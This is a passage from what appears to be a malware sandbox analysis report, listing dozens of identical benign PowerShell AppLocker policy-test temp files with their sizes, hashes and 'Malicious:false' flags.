                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3n5wr15n.vbe.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3v2pzawg.lix.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4qovhmoz.iv4.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4t3z00dg.sky.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4u1jcqp5.f2b.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4upwjdem.y4q.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5cqc3rrt.qni.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5cz4qiv4.jva.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a2uvxrdo.k3c.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ar2wh4zy.ifa.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avzonf0z.yjm.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bgvn35ed.vou.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btbnrk0q.1an.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3azgtbl.v2p.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ceuul1pt.cbd.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cflqyjzq.vok.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpjttkbc.odb.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ctoxfheo.3xt.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d3zhhpkl.ca2.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfnpyubh.ebg.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkerxnmi.psd.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_efily54w.y10.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_epvmq3zy.05r.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_exldoegh.euy.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5lo4zwe.fyo.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fk2idxlq.ud0.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gldr2q1d.ptu.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gswstnsj.msy.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gul2sp5g.wgb.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
